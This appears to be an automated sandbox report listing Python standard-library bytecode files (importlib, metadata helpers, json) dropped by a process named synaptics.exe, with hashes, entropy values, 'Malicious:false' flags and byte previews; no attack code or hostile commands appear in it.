                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:UjoXT16iGMJgQFpAquj8G4ZA+uXsrmH58K:UeG0OquCrcsr3K
                                                                                                                                                                                                                                  MD5:D3982E3E74C7786E06F7725D9B1686E1
                                                                                                                                                                                                                                  SHA1:5160E83451EFD289B49B66E334A3F5538B46F740
                                                                                                                                                                                                                                  SHA-256:67A297408E33CE061F73392CB64C9EE60C33BE1642CB48AAE49D720D1A758D56
                                                                                                                                                                                                                                  SHA-512:5D844A09D281BFD3250A4BDD3D88FBB2CD1AEE25B06497583F82C1E68C0FA2E263DEB0756E8BAD9120C971E0A299D423193DD612D7818696B06E0D8D4359BDFF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dR........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d...Z.d.S.).z9The machinery of importlib: finders, loaders, hooks, etc......)...ModuleSpec)...BuiltinImporter)...FrozenImporter)...SOURCE_SUFFIXES..DEBUG_BYTECODE_SUFFIXES..OPTIMIZED_BYTECODE_SUFFIXES..BYTECODE_SUFFIXES..EXTENSION_SUFFIXES)...WindowsRegistryFinder)...PathFinder)...FileFinder)...SourceFileLoader)...SourcelessFileLoader)...ExtensionFileLoaderc....................C...s....t.t...t...S.).zAReturns a list of all recognized module suffixes for this process).r....r....r......r....r.....5C:\Users\Public\M20EKMMEH2\lib\importlib\machinery.py..all_suffixes....s......r....N)...__doc__.._bootstrapr....r....r......_bootstrap_externalr....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r......<module>....s............................
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5193
                                                                                                                                                                                                                                  Entropy (8bit):4.877838200921494
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:yPvjoTQ1zsquRgowzdmCbBavWMPTjTzKuhXBoPTl906kEt7IQ7ClEXsjMptAWrxB:pQ1ztyvedlbB7IruuhXBoPTlK9EhIQOi
                                                                                                                                                                                                                                  MD5:D032C4899CEF031E1E20364F80E5BE04
                                                                                                                                                                                                                                  SHA1:4309F1F9E5FD88FA6CCD0268FA7A675FE82FA275
                                                                                                                                                                                                                                  SHA-256:A0BFF449E03158027A5186D129FB62E59FF4A26BF947A12DFFBC96B209B8A4C3
                                                                                                                                                                                                                                  SHA-512:E1C92E6CB804CF18AE497A7BD41E69B292CEF1B140DB0F44FECD5CAC2095B64745C45586AFF0C50616132C0CD2BCBE96887F22134E685335A30EA74D766F3E5E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d~........................@...sx...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.S.)......N.....)...abcc....................C...s....t.t.j...|.....S...N)...iter..collections..OrderedDict..fromkeys)...items..r.....3C:\Users\Public\M20EKMMEH2\lib\importlib\readers.py..remove_duplicates...........r....c....................@....$...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...FileReaderc....................C...s....t...|.j...j.|._.d.S.r....)...pathlib..Path..path..parent)...self..loaderr....r....r......__init__....s......z.FileReader.__init__c....................C........t.|.j...|.....S...z{. Return the file system path to prevent. `resources.path()` from creating a temporary. copy.. ....strr......joinpath..r......resourcer....r....r......resource_path...........z.FileReader.resource_pathc....................C........|.j.S.r......r......r....r....r....r......files...........z.FileReade
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5380
                                                                                                                                                                                                                                  Entropy (8bit):5.342626389196693
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:ozYSudPIqJNGeMzW9dlfxVoD0JJgFGx6qjBfjO6y3SnKL49oNhbMrhKgTlv:oJBnS9xVOSJgGx6AjI3SKyhRTlv
                                                                                                                                                                                                                                  MD5:E9819C62E5380010C647997624E64750
                                                                                                                                                                                                                                  SHA1:FD89584CEF8667C7AFA03515BB8975361943CE8B
                                                                                                                                                                                                                                  SHA-256:E0AEE6D3768A8C96A41D45D3316DC0A9B0439AC6469E5A62674CDACE26F70530
                                                                                                                                                                                                                                  SHA-512:50D7A4C0483BA42C1A898DAB94E2AD5CD7D356878F06F4043D351980C6F1E757E40EB746FD331511F1BBA2CAFE454EF689F5F9723226BE716A026E2AFD7124EB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z e.e!e.f...Z"e.e!e.j#f...Z$d.e"d.e$d.e.f.d.d...Z%....d3d.e"d.e$d.e!d.e!d.e.f.d.d...Z&d.e"d.e$d.e'f.d.d...Z(....d3d.e"d.e$d.e!d.e!d.e!f.d.d ..Z)d.e"d.e$d.d!f.d"d#..Z*d$d%..Z+d&d'..Z,d(d)..Z-d.e"d*e!d.e.f.d+d,..Z/d.e"d.e.e!..f.d-d...Z0e.d/d0....Z1e1.2e...d1d2....Z3d.S.)4.....N.....)..._common)...as_file..files)...ResourceReader)...suppress)...ResourceLoader)...ModuleSpec)...BytesIO..TextIOWrapper)...Path)...ModuleType)...ContextManager..Iterable..Union)...cast)...BinaryIO..TextIO)...Sequence)...singledispatch)...Package..Resourcer....r......contentsr......is_resource..open_binary..open_text..path..read_binary..read_text..package..resource..returnc....................C...s&...t...|...}.t...|...}.t...|...}.|.d.u.r.|...|...S.t.t.|.j...}.|
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9340
                                                                                                                                                                                                                                  Entropy (8bit):5.32111882168594
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Tpt6ll1YVqQzvbab+Q3+LbcwE5lFz0w7/RhZT:FUl1YVqoeb+QuLbpmFz06RhZT
                                                                                                                                                                                                                                  MD5:2AD1B91E7EABADB7BF6B2A7C7D917AA3
                                                                                                                                                                                                                                  SHA1:B5DA557C3B29718AEDAE4845337C3E1D829B27BF
                                                                                                                                                                                                                                  SHA-256:787D87EB1CDE77D2957760B83A0DA8D308102C0DC87A951C6B457410B2470451
                                                                                                                                                                                                                                  SHA-512:28D32D720812009B941D3447EECEEE9B7805000E2EB98AC13FAAB6A003B6BE1FB572D3EDA39BC5FAACC9B34DB5EB25249CB01DE838C0DA80BB4F4AD59EA3DC8D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s*...d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d...Z.d.d...Z.d$d.d...Z.d$d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.G.d d!..d!e.j...Z.G.d"d#..d#e...Z d.S.)%z-Utility code for constructing importers, etc......)...Loader)...module_from_spec)..._resolve_name)...spec_from_loader)..._find_spec)...MAGIC_NUMBER)..._RAW_MAGIC_NUMBER)...cache_from_source)...decode_source)...source_from_cache)...spec_from_file_location.....)...contextmanagerNc....................C...s....t...t.|...S.).zBReturn the hash of *source_bytes* as used in hash-based pyc files.)..._imp..source_hashr....)...source_bytes..r.....0C:\Users\Public\M20EKMMEH2\lib\importlib\util.pyr........s......r....c....................C...s\...|...d...s.|.S.|.s.t.d.t.|.....d.......d.}.|.D.].}.|.d.k.r...n.|.d.7.}.q.t.|.|.d.....|.|...S.).z2Resolve a relati
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):37107
                                                                                                                                                                                                                                  Entropy (8bit):5.211809166503817
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:u6MjZ3JEQWRwd2Aj+j5HlBqOVKpmtI5FugF0Mj:u6cAL9BANHcgFRj
                                                                                                                                                                                                                                  MD5:19656B37BE2FA7C5843530E618BA9FDD
                                                                                                                                                                                                                                  SHA1:BFE69A6EBDA7EDF526ACAF27FCB9A619B5619A02
                                                                                                                                                                                                                                  SHA-256:8E32725A861395D05E8848808063FD7120D2BF2A7F737F8CECB09750803FE289
                                                                                                                                                                                                                                  SHA-512:4A6C02CA19E9108E3F94542BDF740FC12AB1ABEC3D5F3294ACD2A1B4B004F2CB55C34D297DD66D9A5C7EBD5F32EEF229FBFEFB4D82E545CFEF0F7487D12019DE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.{.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l.m"Z"..d.d.l#m$Z$m%Z%m&Z&m'Z'..g.d...Z(G.d.d...d.e)..Z*G.d.d...d...Z+G.d.d...d.e..,d.d.....Z-G.d.d...d.e...Z/G.d.d...d.e/..Z0G.d.d...d...Z1G.d.d...d.e1e2..Z3G.d.d ..d e.j4..Z5G.d!d"..d"..Z6G.d#d$..d$..Z7G.d%d&..d&e!..Z8G.d'd(..d(..Z9G.d)d*..d*..Z:G.d+d,..d,..Z;G.d-d...d.e8..Z<G.d/d0..d0e7..Z=d1d2..Z>d3d4..Z?d5e.j.f.d6d7..Z@d8d9..ZAd5e'e0e3f...f.d:d;..ZBd<d=..ZCd>d?..ZDd5e%eEe$eE..f...f.d@dA..ZFd.S.)B.....N.....)..._adapters.._meta)...PackageMetadata)...FreezableDefaultDict..Pair)...method_cache..pass_none)...unique_everseen).r......SimplePath)...suppress)...import_module)...MetaPathFinder)...starmap)...List..Mapping..Optional..Union)...Distribution..DistributionFinderr......PackageNotFoundError..
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2355
                                                                                                                                                                                                                                  Entropy (8bit):5.15741278545636
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:2NuvHOKjDYXocKHdq5UHdUktPdSNwplt9SDYvloUTG:nHOKqocKHdqUdUWlSWplZ9oEG
                                                                                                                                                                                                                                  MD5:6D7E95ED715597B094B972B663428882
                                                                                                                                                                                                                                  SHA1:1796319A45EFFB589F59DF400D58B8A122BE0667
                                                                                                                                                                                                                                  SHA-256:F56545F50732839C701CBBE24287EE8664BD3EA44A66A7D7C651E9599A265F4A
                                                                                                                                                                                                                                  SHA-512:7F866DAA883A3605C68EFA9593BCE0BF469DAFAF2C3210683CD6F878ED572CEAC86A4D782175B61732410BAD69F3E5626C87B6C68B320B852A1F9993D8ABE809
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s<...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...G.d.d...d.e.j.j...Z.d.S.)......N.....)...FoldedCasec........................sb...e.Z.d.Z.e.e.e.g.d.......Z...d.e.j.j.f...f.d.d...Z.d.d...Z...f.d.d...Z.d.d...Z.e.d.d.....Z.....Z.S.)...Message).Z.Classifierz.Obsoletes-DistZ.Platformz.Project-URLz.Provides-Distz.Provides-Extraz.Requires-Distz.Requires-Externalz.Supported-PlatformZ.Dynamic..origc........................s"...t.....|...}.t.|.....t.|.......|.S...N)...super..__new__..vars..update)...clsr......res....__class__...>C:\Users\Public\M20EKMMEH2\lib\importlib\metadata\_adapters.pyr........s..........z.Message.__new__c....................O...s....|.....|._.d.S.r....)..._repair_headers.._headers)...self..args..kwargsr....r....r......__init__#...s......z.Message.__init__c........................s....t.......S.r....).r......__iter__..r....r....r....r....r....'...s......z.Message.__iter__c........................s>...d.d.......f.d.d...t.|...d...D...}.|.j.r.|
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1530
                                                                                                                                                                                                                                  Entropy (8bit):5.032152285675819
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:zBf0kCRklLM8ZOSIJOmhgP3uSx+uTVMPt/fkWB16RB6lghkChedco/qq6Ddqrqqp:zBf0Xkl4KOSI4mh6px+aqdcWB1cegfhW
                                                                                                                                                                                                                                  MD5:72667F0526E3B68384AB2C81F4593D3D
                                                                                                                                                                                                                                  SHA1:8A0F027B154BF6F6CF05377751AFAD03C0D97058
                                                                                                                                                                                                                                  SHA-256:4BF6441D4015AAF82FB8C99C3CD8111AC10FDD0B6F3CF5BD9993192BB4A4FB22
                                                                                                                                                                                                                                  SHA-512:709E8A7424EDB186BB17EDADAB78BF4776C3766B42FC43D0CAD1AF4824B0268172B377107379A4D5A466CC92DA7A2F5E7C4255D865CBD57A8B5138AB3E75E1DE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s6...d.d.l.Z.G.d.d...d.e.j...Z.G.d.d...d.e...d.d.....Z.d.S.)......Nc........................s(...e.Z.d.Z.d.Z...f.d.d...Z.d.d...Z.....Z.S.)...FreezableDefaultDicta!.... Often it is desirable to prevent the mutation of. a default dict after its initial construction, such. as to prevent mutation during iteration... >>> dd = FreezableDefaultDict(list). >>> dd[0].append('1'). >>> dd.freeze(). >>> dd[1]. []. >>> len(dd). 1. c........................s....t.|.d.t...j...|...S.).N.._frozen)...getattr..super..__missing__)...self..key....__class__...AC:\Users\Public\M20EKMMEH2\lib\importlib\metadata\_collections.pyr........s......z FreezableDefaultDict.__missing__c........................s......f.d.d....._.d.S.).Nc........................s..........S.).N)...default_factory).r......r....r....r......<lambda>....s......z-FreezableDefaultDict.freeze.<locals>.<lambda>).r....r....r....r....r......freeze....s......z.FreezableDefaul
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3120
                                                                                                                                                                                                                                  Entropy (8bit):5.100576732033481
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:bHbuTGKoOIXlUsSUUEQ1lGIGX5G5GurSYwBpHPdG7lfsJdSOTK/J/SarXN0le/yk:SoOCDUX4sXwjvMXNpa5f1qoOIk
                                                                                                                                                                                                                                  MD5:0785161A61095FE3E15F29F5D14BE29C
                                                                                                                                                                                                                                  SHA1:1809F8C4D714C567883C8BCBC74567399E552E29
                                                                                                                                                                                                                                  SHA-256:983EA285E9968D6DEE86C7705CF7FA5B7B65EB5C89A1BEA3B74EFF59BEFC1E4F
                                                                                                                                                                                                                                  SHA-512:6DAF6F971232C4EAE1B7A3424B23E5590EDAE6BA9633DE4ABB6F1532AC45FD8F097F81782FEA4C8F25424E1489B6DC5F6271E40ED3FF583A0D31854C7CE540B4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s&...d.d.l.Z.d.d.l.Z.d.d.d...Z.d.d...Z.d.S.)......Nc........................s(.....p.t...........f.d.d...}.d.d...|._.|.S.).aV.... Wrap lru_cache to support storing the cache data in the object instances... Abstracts the common paradigm where the method explicitly saves an. underscore-prefixed protected property on first call and returns that. subsequently... >>> class MyClass:. ... calls = 0. .... ... @method_cache. ... def method(self, value):. ... self.calls += 1. ... return value.. >>> a = MyClass(). >>> a.method(3). 3. >>> for x in range(75):. ... res = a.method(x). >>> a.calls. 75.. Note that the apparent behavior will be exactly like that of lru_cache. except that the cache is stored on each instance, so values in one. instance will not flush values from another, and when an instance is. deleted, so are the cached values for that instance...
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):582
                                                                                                                                                                                                                                  Entropy (8bit):5.176887439871264
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:Cu//48ZPUbmR6OHRgD4gvwfJLV0jyr4eN++2soVzoufN++k+Zqq18:ZDPUe6+k4fJgyESXODlfnZqq18
                                                                                                                                                                                                                                  MD5:BA0FAB1CF9A23A0429497657BBAF02AE
                                                                                                                                                                                                                                  SHA1:DD3FBE9D2F19F1086B22A5F5AB363C9065C731F0
                                                                                                                                                                                                                                  SHA-256:2AD367EF75EF6BC50B1AFA918B8563648B844F7AF206F37FA51B35ED1A471DD2
                                                                                                                                                                                                                                  SHA-512:DD20D970428FF17B58A359B9667BCAED74BCB86ACD49C8FEA38F9AB2A3C1B934AAF23002D12A4EBDD58750556C5F4D3368C3DE958738C8C046672E989DBB3AB2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dr........................@...s....d.d.l.m.Z...d.d.d...Z.d.S.)......)...filterfalseNc....................c...sf.....t...}.|.j.}.|.d.u.r.t.|.j.|...D.].}.|.|.....|.V...q.d.S.|.D.].}.|.|...}.|.|.v.r0|.|.....|.V...q.d.S.).zHList unique elements, preserving order. Remember all elements ever seen.N)...set..addr......__contains__)...iterable..key..seenZ.seen_add..element..k..r.....?C:\Users\Public\M20EKMMEH2\lib\importlib\metadata\_itertools.py..unique_everseen....s..................................r....).N)...itertoolsr....r....r....r....r....r......<module>....s........
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2275
                                                                                                                                                                                                                                  Entropy (8bit):4.727523063114668
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:OgnzBuSda0olUuJpYwj1JEZNmsZBCdHEjX9vlq:OgNuaa0sUAp/j1JErm8BCdHED90
                                                                                                                                                                                                                                  MD5:68FEDBEC5A4CA4E39B49D8A02AAB3E14
                                                                                                                                                                                                                                  SHA1:C4A110F18114985A86790B0080A5034EAB59D3AF
                                                                                                                                                                                                                                  SHA-256:6272FE4EA1D18A4DD9CCC3E1158F02F5DCFB70370DBF7A6BABFE6BAACE107CF8
                                                                                                                                                                                                                                  SHA-512:15631CE11FA206D920748B2646F1631CD85D44B67A422197E97E55381FF29A11D356E6C0EE1334C6825284CE722BD6E97DD18D7839FBDF36CE77724EB2ABE1C9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sP...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.)......)...Any..Dict..Iterator..List..Protocol..TypeVar..Union.._Tc....................@...s....e.Z.d.Z.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.e...f.d.d...Z.d.d.e.d.e.d.e.e.e...e.f...f.d.d...Z.e.d.e.e.e.e.e.e...f...f...f.d.d.....Z.d.S.)...PackageMetadata..returnc....................C........d.S...N......selfr....r.....:C:\Users\Public\M20EKMMEH2\lib\importlib\metadata\_meta.py..__len__...........z.PackageMetadata.__len__..itemc....................C...r....r....r....).r....r....r....r....r......__contains__....r....z.PackageMetadata.__contains__..keyc....................C...r....r....r....).r....r....r....r....r......__getitem__....r....z.PackageMetadata.__getitem__c....................C...r....r....r....r....r....r....r......__iter__....r....z.PackageMetadata.__iter__...name..failobjc....................C........d.S.).zP. Return all values
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3071
                                                                                                                                                                                                                                  Entropy (8bit):5.061915923845925
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:10RhiYmIWTDvbG12wYRzHiUyOrIuxeQc2zGV4Krj4iOqLigqyiFqYbvHqMHXNVwo:1OhFXWTrbGowYRzHinOrIAeQc2u4KrHG
                                                                                                                                                                                                                                  MD5:653F72D3827582D9B35356A5F47F78D8
                                                                                                                                                                                                                                  SHA1:DA0B336E7004159E623C17529A6C0FF01549C8D9
                                                                                                                                                                                                                                  SHA-256:2BB67B8251F5D65C3E91B1A4BA52F9A878EC048C05AF38569EECD39AFECDF878
                                                                                                                                                                                                                                  SHA-512:EBCB0938569789A2DA195247F942C844D8F873D6DC5CBE9D0582828661DB1DE154B877FD47B595B40247C6C8C40F2553EBBF5E20B3D9A4BA52BFAC48382F00B9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s(...d.d.l.Z.d.d.l.m.Z...G.d.d...d.e...Z.d.S.)......N.....)...method_cachec........................sr...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z...f.d.d...Z.d.d...Z.e...f.d.d.....Z.d.d...Z.d.d.d...Z.....Z.S.)...FoldedCasea{.... A case insensitive string class; behaves just like str. except compares equal when the only variation is case... >>> s = FoldedCase('hello world').. >>> s == 'Hello World'. True.. >>> 'Hello World' == s. True.. >>> s != 'Hello World'. False.. >>> s.index('O'). 4.. >>> s.split('O'). ['hell', ' w', 'rld'].. >>> sorted(map(FoldedCase, ['GAMMA', 'alpha', 'Beta'])). ['alpha', 'Beta', 'GAMMA'].. Sequence membership is straightforward... >>> "Hello World" in [s]. True. >>> s in ["Hello World"]. True.. You may test for set inclusion, but candidate and elements. must both be folded... >>> FoldedCase("Hello World") in {s}. True. >>> s in {FoldedCa
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12275
                                                                                                                                                                                                                                  Entropy (8bit):5.384902524328476
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:gM0k25NKigD6B7+vx1GkRGqb9j4BtKv72vx1GkRGqb4MmQTQOQkQsx1LtbQkQsxz:gM0TNKigBvx99j4n3vxx47OZrXZrb/
                                                                                                                                                                                                                                  MD5:FA7E9058305BC41C39C61C4BB3E3DC63
                                                                                                                                                                                                                                  SHA1:C1F0B756AC02D11D39089C09DF720266F5A8569C
                                                                                                                                                                                                                                  SHA-256:7E0CBD768B76F520A86D4DE76A854F71C888CA76BA4A0008A894D143AB7796E6
                                                                                                                                                                                                                                  SHA-512:6F5B64757AEE6767B17F279B3B7F2E14364F7F6B9E8628FD57EA5D08BA1BC244901FF1550360CF52DCD988AFBFE477E9757B946D0C0F63A05E73256FF95EC6EB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d+8.......................@...s....d.Z.d.Z.g.d...Z.d.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.Z.e.d.d.d.d.d.d.d.d...Z.d.d.d.d.d.d.d.d.d.d...d.d...Z.d.d.d.d.d.d.d.d.d.d...d.d...Z.e.d.d.d...Z.d.d...Z.d.d.d.d.d.d.d...d.d...Z.d.d.d.d.d.d.d...d.d...Z.d.S.).a....JSON (JavaScript Object Notation) <https://json.org> is a subset of.JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data.interchange format...:mod:`json` exposes an API familiar to users of the standard library.:mod:`marshal` and :mod:`pickle` modules. It is derived from a.version of the externally maintained simplejson library...Encoding basic Python object hierarchies::.. >>> import json. >>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}]). '["foo", {"bar": ["baz", null, 1.0, 2]}]'. >>> print(json.dumps("\"foo\bar")). "\"foo\bar". >>> print(json.dumps('\u1234')). "\u1234". >>> print(json.dumps('\\')). "\\". >>> print(json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)). {"
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9777
                                                                                                                                                                                                                                  Entropy (8bit):5.5636759125685105
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:CEe7Hw/ynOu7lf2/K40QuqLpftfgwjF8mbANHFThJt7AeIWE9b9C10:1sHw/yNV2/MQ3htR8muIjV9Ce
                                                                                                                                                                                                                                  MD5:5328D1B75A8D30D1A45C7530FEB28596
                                                                                                                                                                                                                                  SHA1:CD0C4A98D2CE781AAC9347C32C8B0BE395904D09
                                                                                                                                                                                                                                  SHA-256:6BB8F66C6E32D4775A8341B92C920123E9A9DC541438DC5EA6A9BB3C765FBA11
                                                                                                                                                                                                                                  SHA-512:07A4DD7D40331159416ADDC8ED0C944B911117143F5A8127C209FF557A8C4C055EF458D3D29F7F4234D893DD44F621BF6D368FD642B744DE2013215741DFA689
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.2.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y.......d.Z.Y.n.w.d.d.g.Z.e.j.e.j.B.e.j.B.Z.e.d...Z.e.d...Z.e.d...Z.G.d.d...d.e...Z.e.e.e.d...Z.e...d.e...Z.d.d.d.d.d.d.d.d.d...Z.d.d...Z.d.e.e.j.f.d.d...Z.e.phe.Z.e...d.e...Z.d.Z.d.e.j.e.f.d.d...Z.e.j.e.f.d.d ..Z.G.d!d...d.e...Z.d.S.)"z.Implementation of JSONDecoder......N)...scanner)...scanstring..JSONDecoder..JSONDecodeError..nan..infz.-infc....................@...s ...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.S.).r....a ...Subclass of ValueError with the following additional properties:.. msg: The unformatted error message. doc: The JSON document being parsed. pos: The start index of doc where parsing failed. lineno: The line corresponding to pos. colno: The column corresponding to pos.. c....................C...sb...|...d.d.|...d...}.|.|...d.d.|.....}.d.|.|.|.|.f...}.t...|.|.....|.|._.|.|._.|.|._.|.|._.|.|._.d.S.).N...r.........z.%s: line %d column %d (char %d))...count..rfind..ValueE
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11128
                                                                                                                                                                                                                                  Entropy (8bit):5.497391527911391
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:UqBYTkkgsft4MszI6lxnP14KAZX/WPxDvoLabuHyjnFibetRv4UO4FR0Q:dyDiMUnd4CPxDzbuS7FiTEd
                                                                                                                                                                                                                                  MD5:B8BF4CC43400D88A9B5C03A5AD57F803
                                                                                                                                                                                                                                  SHA1:B4F156276EA59253CE16514F2F643E13A7A38FBD
                                                                                                                                                                                                                                  SHA-256:4536CEEE68F3879C5EED1FA08966E005A63D3059ECE8D09E3BBFF70EFBDFC5CE
                                                                                                                                                                                                                                  SHA-512:767CCEE73C65FA2E1E4E47FF7B1530AFB1C502DF701D83A25E90CA3DE0ECFE81D3F1D5E796FF530D8E653BFB36DB75282B686F3DE2DA3B5DFFD690D4B208CCE2
                                                                                                                                                                                                                                  Malicious:false
